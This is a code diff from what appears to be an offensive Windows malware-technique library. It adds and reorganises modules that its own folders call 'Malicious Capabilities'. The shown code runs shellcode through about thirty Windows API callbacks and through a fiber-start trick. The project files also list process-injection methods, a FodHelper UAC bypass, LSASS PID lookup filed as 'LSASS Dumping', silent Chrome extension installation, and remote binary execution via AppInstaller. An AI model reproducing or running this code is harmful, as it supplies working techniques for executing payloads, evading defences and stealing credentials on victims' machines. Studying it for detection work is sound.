EnumSystemGeoID(GEOCLASS_NATION, 0, (GEO_ENUMPROC)BinAddress);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMSYSTEMLANGUAGEGROUPS:
|
||||
{
|
||||
EnumSystemLanguageGroupsW((LANGUAGEGROUP_ENUMPROCW)BinAddress, LGRPID_SUPPORTED, NULL);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMSYSTEMLOCALESEX:
|
||||
{
|
||||
EnumSystemLocalesEx((LOCALE_ENUMPROCEX)BinAddress, LOCALE_ALL, NULL, NULL);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMTHREADWINDOWS:
|
||||
{
|
||||
EnumThreadWindows(0, (WNDENUMPROC)BinAddress, NULL);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMTIMEFORMATSEX:
|
||||
{
|
||||
EnumTimeFormatsEx((TIMEFMT_ENUMPROCEX)BinAddress, LOCALE_NAME_SYSTEM_DEFAULT, TIME_NOSECONDS, NULL);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMUILANGUAGESW:
|
||||
{
|
||||
EnumUILanguagesW((UILANGUAGE_ENUMPROCW)BinAddress, MUI_LANGUAGE_ID, NULL);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMWINDOWSTATIONSW:
|
||||
{
|
||||
EnumWindowStationsW((WINSTAENUMPROCW)BinAddress, NULL);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMWINDOWS:
|
||||
{
|
||||
EnumWindows((WNDENUMPROC)BinAddress, NULL);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_MESSAGEBOXINDIRECT:
|
||||
{
|
||||
MSGBOXPARAMS MessageBoxParams = { 0 };
|
||||
MessageBoxParams.cbSize = sizeof(MSGBOXPARAMS);
|
||||
MessageBoxParams.dwStyle = MB_HELP;
|
||||
MessageBoxParams.lpfnMsgBoxCallback = (MSGBOXCALLBACK)BinAddress;
|
||||
MessageBoxParams.lpszText = L"[Unstable] Help Executes Shellcode";
|
||||
|
||||
MessageBoxIndirect(&MessageBoxParams);
|
||||
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMERATELOADEDMODULES:
|
||||
{
|
||||
EnumerateLoadedModules64(InlineGetCurrentProcess, (PENUMLOADED_MODULES_CALLBACK64)BinAddress, NULL);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMPAGEFILESW:
|
||||
{
|
||||
K32EnumPageFilesW((PENUM_PAGE_FILE_CALLBACKW)BinAddress, NULL);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMPWRSCHEMES:
|
||||
{
|
||||
EnumPwrSchemes((PWRSCHEMESENUMPROC)BinAddress, NULL);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_DNSQUERYEX:
|
||||
{
|
||||
//needs to be debugged
|
||||
|
||||
/*
|
||||
DNS_QUERY_REQUEST Request = { 0 };
|
||||
DNS_QUERY_RESULT Result = { 0 };
|
||||
|
||||
Request.Version = DNS_QUERY_REQUEST_VERSION1;
|
||||
Request.QueryName = NULL;
|
||||
Request.QueryType = DNS_TYPE_A;
|
||||
Request.QueryOptions = DNS_QUERY_STANDARD;
|
||||
Request.InterfaceIndex = 0;
|
||||
Request.pQueryCompletionCallback = (PDNS_QUERY_COMPLETION_ROUTINE)BinAddress;
|
||||
|
||||
DnsQueryEx(&Request, &Result, NULL);
|
||||
*/
|
||||
|
||||
}
|
||||
|
||||
case E_RTLUSERFIBERSTART:
|
||||
{
|
||||
RTLUSERFIBERSTART RtlUserFiberStart = NULL;
|
||||
DWORD64 FiberData = NULL;
|
||||
PTEB Teb = GetTeb();
|
||||
|
||||
RtlUserFiberStart = (RTLUSERFIBERSTART)GetProcAddressW((DWORD64)GetModuleHandleEx2W(L"ntdll.dll"), L"RtlUserFiberStart");
|
||||
if (RtlUserFiberStart == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Teb->SameTebFlags |= 0b100;
|
||||
|
||||
FiberData = (DWORD64)HeapAlloc(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, 0x100);
|
||||
if (FiberData == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
*(LPVOID*)(FiberData + 0x0a8) = BinAddress;
|
||||
|
||||
__writegsqword(0x20, FiberData);
|
||||
|
||||
RtlUserFiberStart();
|
||||
|
||||
}
|
||||
|
||||
default:
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
}
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hModule)
|
||||
FreeLibrary(hModule);
|
||||
|
||||
if (BinAddress)
|
||||
VirtualFree(BinAddress, 0, MEM_RELEASE);
|
||||
|
||||
return (bFlag ? 0 : 0xffffffff);
|
||||
}
|
||||
|
||||
BOOL ShellcodeExecutionViaFunctionCallbackMain(_In_ PSHELLCODE_EXECUTION_INFORMATION Sei)
|
||||
{
|
||||
return CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)ShellcodeExecutionDispatchHandler, Sei, INFINITE);
|
||||
}
|
|
@ -239,7 +239,7 @@
|
|||
<ClCompile Include="IsRegistryKeyValid.cpp" />
|
||||
<ClCompile Include="LdrLoadGetProcedureAddress.cpp" />
|
||||
<ClCompile Include="MemoryFindMemory.cpp" />
|
||||
<ClCompile Include="MpfExtractMaliciousPayloadFromZipFile.cpp" />
|
||||
<ClCompile Include="MpfExtractMaliciousPayloadFromZipFileNoPassword.cpp" />
|
||||
<ClCompile Include="MpfLolExecuteRemoteBinaryByAppInstaller.cpp" />
|
||||
<ClCompile Include="Main.cpp" />
|
||||
<ClCompile Include="ManualResourceDataFetching.cpp" />
|
||||
|
@ -251,8 +251,37 @@
|
|||
<ClCompile Include="MpfGetLsaPidFromNamedPipe.cpp" />
|
||||
<ClCompile Include="MpfGetLsaPidFromRegistry.cpp" />
|
||||
<ClCompile Include="MpfGetLsaPidFromServiceManager.cpp" />
|
||||
<ClCompile Include="MpfPiControlInjection.cpp" />
|
||||
<ClCompile Include="MpfPiQueueUserAPCViaAtomBomb.cpp" />
|
||||
<ClCompile Include="MpfPiWriteProcessMemoryCreateRemoteThread.cpp" />
|
||||
<ClCompile Include="MpfProcessInjectionViaProcessReflection.cpp" />
|
||||
<ClCompile Include="ProcessInjectionMain.cpp" />
|
||||
<ClCompile Include="MpfSceViaCDefFolderMenu_Create2.cpp" />
|
||||
<ClCompile Include="MpfSceViaCertEnumSystemStore.cpp" />
|
||||
<ClCompile Include="MpfSceViaCertEnumSystemStoreLocation.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumChildWindows.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumDateFormatsW.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumDesktopsW.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumDesktopWindows.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumDirTreeW.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumDisplayMonitors.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumerateLoadedModules64.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumFontFamiliesExW.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumFontsW.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumLanguageGroupLocalesW.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumObjects.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumPwrSchemes.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumResourceTypesExW.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumSystemCodePagesW.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumSystemGeoID.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumSystemLanguageGroupsW.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumSystemLocalesEx.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumThreadWindows.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumTimeFormatsEx.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumUILanguagesW.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumWindows.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumWindowStationsW.cpp" />
|
||||
<ClCompile Include="MpfSceViaK32EnumPageFilesW.cpp" />
|
||||
<ClCompile Include="MpfSceViaMessageBoxIndirectW.cpp" />
|
||||
<ClCompile Include="ProxyRegisterWaitLoadLibrary.cpp" />
|
||||
<ClCompile Include="ProxyWorkItemLoadLibrary.cpp" />
|
||||
<ClCompile Include="RemoveDescriptorEntry.cpp" />
|
||||
|
|
|
@ -70,6 +70,15 @@
|
|||
<Filter Include="Source Files\Windows API Helper Functions\Malicious Capabilities\Process Injection">
|
||||
<UniqueIdentifier>{afb1a792-4365-4fb2-ae74-b93768c98289}</UniqueIdentifier>
|
||||
</Filter>
|
||||
<Filter Include="Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution">
|
||||
<UniqueIdentifier>{705254d6-86d7-47f6-a661-dd4430493a93}</UniqueIdentifier>
|
||||
</Filter>
|
||||
<Filter Include="Source Files\Windows API Helper Functions\Malicious Capabilities\UAC Bypasses">
|
||||
<UniqueIdentifier>{82ab4698-4174-47b8-8b36-47e02ab01766}</UniqueIdentifier>
|
||||
</Filter>
|
||||
<Filter Include="Source Files\Windows API Helper Functions\Malicious Capabilities\LSASS Dumping">
|
||||
<UniqueIdentifier>{182eb745-5d27-4728-bd5e-030c4df5b57a}</UniqueIdentifier>
|
||||
</Filter>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="Main.cpp">
|
||||
|
@ -321,9 +330,6 @@
|
|||
<ClCompile Include="CreateFileFromDsCopyFromSharedFile.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="UacBypassFodHelperMethod.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="DelayedExecutionExecuteOnDisplayOff.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
|
@ -378,18 +384,12 @@
|
|||
<ClCompile Include="GetPidFromEnumProcesses.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Fingerprinting</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfGetLsaPidFromRegistry.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="GetPidFromPidBruteForcing.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Fingerprinting</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="TryLoadDllMultiMethod.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfGetLsaPidFromServiceManager.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="GetPidFromNtQueryFileInformation.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Fingerprinting</Filter>
|
||||
</ClCompile>
|
||||
|
@ -399,12 +399,6 @@
|
|||
<ClCompile Include="CreateThreadAndWaitForCompletion.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfGetLsaPidFromNamedPipe.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="ShellcodeExecutionViaFunctionCallbackMain.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfComMonitorChromeSessionOnce.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
|
||||
</ClCompile>
|
||||
|
@ -543,18 +537,120 @@
|
|||
<ClCompile Include="MpfProcessInjectionViaProcessReflection.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Process Injection</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="ProcessInjectionMain.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Process Injection</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MemoryFindMemory.cpp">
|
||||
<Filter>Source Files\String Manipulation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MiscGenericShellcodePayloads.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfExtractMaliciousPayloadFromZipFile.cpp">
|
||||
<ClCompile Include="MpfPiWriteProcessMemoryCreateRemoteThread.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Process Injection</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfPiQueueUserAPCViaAtomBomb.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Process Injection</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfPiControlInjection.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Process Injection</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="ShellcodeExecutionViaFunctionCallbackMain.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="UacBypassFodHelperMethod.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\UAC Bypasses</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfGetLsaPidFromNamedPipe.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\LSASS Dumping</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfGetLsaPidFromRegistry.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\LSASS Dumping</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfGetLsaPidFromServiceManager.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\LSASS Dumping</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfExtractMaliciousPayloadFromZipFileNoPassword.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumChildWindows.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaCDefFolderMenu_Create2.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaCertEnumSystemStore.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaCertEnumSystemStoreLocation.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumDateFormatsW.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumDesktopWindows.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumDesktopsW.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumDirTreeW.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumDisplayMonitors.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumFontFamiliesExW.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumFontsW.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumLanguageGroupLocalesW.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumObjects.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumResourceTypesExW.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumSystemCodePagesW.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumSystemGeoID.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumSystemLanguageGroupsW.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumSystemLocalesEx.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumThreadWindows.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumTimeFormatsEx.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumUILanguagesW.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumWindowStationsW.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumWindows.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumerateLoadedModules64.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaK32EnumPageFilesW.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumPwrSchemes.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaMessageBoxIndirectW.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="Internal.h">
|
||||
|
|
|
@ -38,72 +38,6 @@
|
|||
#define InlineGetCurrentThread ((HANDLE)(LONG_PTR)-2)
|
||||
#define InlineGetCurrentProcess (HANDLE)((HANDLE)-1)
|
||||
|
||||
|
||||
/*******************************************
|
||||
SHELLCODE VIA CALLBACK ROUTINE INFORMATION
|
||||
*******************************************/
|
||||
|
||||
/*
|
||||
|
||||
LPBYTE Payload
|
||||
a pointer to shellcode
|
||||
DWORD dwLengthOfPayloadInBytes
|
||||
the length of the payload in bytes
|
||||
Enum SHELLCODE_EXECUTION_METHOD
|
||||
specifies shellcode execution method
|
||||
|
||||
|
||||
example:
|
||||
SHELLCODE_EXECUTION_INFORMATION Sei = { 0 };
|
||||
Sei.Payload = Shellcode; //pointer to shellcode
|
||||
Sei.dwLengthOfPayloadInBytes = 280; //whatever the length is
|
||||
Sei.Method = E_CERTENUMSYSTEMSTORE; //method from SHELLCODE_EXECUTION_METHOD
|
||||
*/
|
||||
|
||||
typedef enum SHELLCODE_EXECUTION_METHOD {
|
||||
E_CDEFFOLDERMENU_CREATE2 = 1,
|
||||
E_CERTENUMSYSTEMSTORE, //2
|
||||
E_CERTENUMSYSTEMSTORELOCATION, //3
|
||||
E_CERTFINDCHAININSTORE, //4 UNSTABLE, FAILS
|
||||
E_ENUMCHILDWINDOWS, //5
|
||||
E_ENUMDATEFORMATSW, //6
|
||||
E_ENUMDESKTOPWINDOWS, //7
|
||||
E_ENUMDESKTOPSW, //8
|
||||
E_ENUMDIRTREEW, //9
|
||||
E_ENUMDISPLAYMONITORS, //10
|
||||
E_ENUMFONTFAMILIESEXW, //11
|
||||
E_ENUMFONTSW, //12
|
||||
E_ENUMICMPROFILESW, //13 UNSTABLE, FAILS
|
||||
E_ENUMLANGUAGEGROUPLOCALESW, //14
|
||||
E_ENUMOBJECTS, //15
|
||||
E_ENUMPROPSEXW, //16 NOT IMPLEMENTED!
|
||||
E_ENUMRESOURCETYPESEXW, //17
|
||||
E_ENUMSYSTEMCODEPAGES, //18
|
||||
E_ENUMSYSTEMGEOID, //19
|
||||
E_ENUMSYSTEMLANGUAGEGROUPS, //20
|
||||
E_ENUMSYSTEMLOCALESEX, //20
|
||||
E_ENUMTHREADWINDOWS, //21
|
||||
E_ENUMTIMEFORMATSEX, //22
|
||||
E_ENUMUILANGUAGESW, //23
|
||||
E_ENUMWINDOWSTATIONSW, //24
|
||||
E_ENUMWINDOWS, //25
|
||||
E_ENUMPROPSW, //26 UNSTABLE, FAILS
|
||||
E_MESSAGEBOXINDIRECT, //27 UNSTABLE, FAILS
|
||||
E_PERFSTARTPROVIDEREX, //28 UNSTABLE, FAILS
|
||||
E_MINIDUMPWRITEDUMP, //29 UNSTABLE, FAILS
|
||||
E_ENUMERATELOADEDMODULES, //30
|
||||
E_ENUMPAGEFILESW, //31
|
||||
E_ENUMPWRSCHEMES, //32
|
||||
E_DNSQUERYEX, //33
|
||||
E_RTLUSERFIBERSTART //34 UNSTABLE, FAILS
|
||||
}SHELLCODE_EXECUTION_METHOD, *PSHELLCODE_EXECUTION_METHOD;
|
||||
|
||||
typedef struct __SHELLCODE_EXECUTION_INFORMATION {
|
||||
LPBYTE Payload;
|
||||
DWORD dwLengthOfPayloadInBytes;
|
||||
DWORD MethodEnum;
|
||||
}SHELLCODE_EXECUTION_INFORMATION, * PSHELLCODE_EXECUTION_INFORMATION;
|
||||
|
||||
/*******************************************
|
||||
RAD HARDWARE BREAKPOINT HOOKING ENGINE DATA
|
||||
*******************************************/
|
||||
|
@ -129,53 +63,6 @@ inline CRITICAL_SECTION CriticalSection = { 0 };
|
|||
inline DESCRIPTOR_ENTRY* Head = NULL;
|
||||
inline HARDWARE_ENGINE_INIT_SETTINGS_GLOBAL GlobalHardwareBreakpointObject;
|
||||
|
||||
/*******************************************
|
||||
PROCESS INJECTION INFORMATION
|
||||
*******************************************/
|
||||
|
||||
/*
|
||||
|
||||
LPBYTE Payload
|
||||
a pointer to shellcode
|
||||
DWORD dwLengthOfPayloadInBytes
|
||||
the length of the payload in bytes
|
||||
Enum PROCESS_INJECTION_METHOD
|
||||
specifies process injection method
|
||||
DWORD TargetPid
|
||||
specify target process
|
||||
[OPTIONAL] DWORD ThreadId
|
||||
specify target process thread id (depends PROCESS_INJECTION_METHOD)
|
||||
[OPTIONAL] TCHAR PathToFile //depends on if youre using W or A suffix
|
||||
path to DLL to load (depends PROCESS_INJECTION_METHOD)
|
||||
|
||||
|
||||
example:
|
||||
PROCESS_INJECTION_INFORMATION Pii = { 0 };
|
||||
Sei.Payload = Shellcode; //pointer to shellcode
|
||||
Pii.dwLengthOfPayloadInBytes = 280; //whatever the length is
|
||||
Pii.Method = E_PROCESSREFLECTION; //method from PROCESS_INJECTION_METHOD
|
||||
Pii.ProcessId = 100; //whatever the process id is, this is just a random number lol
|
||||
Pii.ThreadId = 0; //not required for this method
|
||||
Pii.PathToFile = DllPath; pointer to path of dll you want loaded, only WCHAR supported
|
||||
|
||||
*/
|
||||
|
||||
typedef enum PROCESS_INJECTION_METHOD {
|
||||
E_WRITEPROCESSMEMORY_CREATEREMOTETHREAD_EXECUTESHELLCODE, //0
|
||||
E_PROCESS_REFLECTION_EXECUTESHELLCODE, //1 UNIMPLEMENTED
|
||||
E_CTRL_INJECT, //2
|
||||
E_QUEUE_USER_APC //3
|
||||
}PROCESS_INJECTION_METHOD, * PPROCESS_INJECTION_METHOD;
|
||||
|
||||
typedef struct __PROCESS_INJECTION_INFORMATION {
|
||||
LPBYTE Payload;
|
||||
DWORD dwLengthOfPayloadInBytes;
|
||||
DWORD MethodEnum;
|
||||
DWORD ProcessId;
|
||||
DWORD ThreadId;
|
||||
PWCHAR PathToFile;
|
||||
}PROCESS_INJECTION_INFORMATION, *PPROCESS_INJECTION_INFORMATION;
|
||||
|
||||
|
||||
|
||||
/*******************************************
|
||||
|
@ -354,18 +241,45 @@ BOOL UacBypassFodHelperMethodW(_In_ PWCHAR PathToBinaryToExecute, _Inout_ PPROCE
|
|||
DWORD MpfGetLsaPidFromRegistry(VOID);
|
||||
DWORD MpfGetLsaPidFromServiceManager(VOID);
|
||||
DWORD MpfGetLsaPidFromNamedPipe(VOID);
|
||||
BOOL ShellcodeExecutionViaFunctionCallbackMain(_In_ PSHELLCODE_EXECUTION_INFORMATION Sei);
|
||||
DWORD MpfComMonitorChromeSessionOnce(VOID);
|
||||
DWORD MpfExecute64bitPeBinaryInMemoryFromByteArrayNoReloc(_In_ PBYTE BinaryImage);
|
||||
BOOL __unstable__preview__MpfSilentInstallGoogleChromePluginW(_In_ PWCHAR ExtensionIdentifier);
|
||||
BOOL __unstable__preview__MpfSilentInstallGoogleChromePluginA(_In_ PCHAR ExtensionIdentifier);
|
||||
BOOL MpfLolExecuteRemoteBinaryByAppInstallerW(_In_ PWCHAR RemoteUrlTextFile, _In_ DWORD RemoteUrlLengthInBytes);
|
||||
BOOL MpfLolExecuteRemoteBinaryByAppInstallerA(_In_ PCHAR RemoteUrlTextFile, _In_ DWORD RemoteUrlLengthInBytes);
|
||||
DWORD ProcessInjectionMain(_In_ PPROCESS_INJECTION_INFORMATION Pii);
|
||||
BOOL MpfProcessInjectionViaProcessReflection(_In_ PBYTE Shellcode, _In_ DWORD dwSizeOfShellcodeInBytes, _In_ DWORD TargetPid);
|
||||
BOOL MpfExtractMaliciousPayloadFromZipFileNoPasswordW(_In_ PWCHAR FullPathToZip, _In_ PWCHAR FullPathToExtractionDirectory);
|
||||
BOOL MpfExtractMaliciousPayloadFromZipFileNoPasswordA(_In_ PCHAR FullPathToZip, _In_ PCHAR FullPathToExtractionDirectory);
|
||||
|
||||
BOOL MpfPiWriteProcessMemoryCreateRemoteThread(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes, _In_ DWORD TargetProcessId);
|
||||
BOOL MpfPiQueueUserAPCViaAtomBomb(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes, _In_ DWORD TargetThreadId);
|
||||
BOOL MpfPiControlInjection(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes, _In_ DWORD TargetProcessId);
|
||||
BOOL MpfSceViaEnumChildWindows(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaCDefFolderMenu_Create2(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaCertEnumSystemStore(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaCertEnumSystemStoreLocation(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaEnumDateFormatsW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaEnumDesktopWindows(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaEnumDesktopsW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaEnumDirTreeW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaEnumDisplayMonitors(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaEnumFontFamiliesExW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaEnumFontsW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
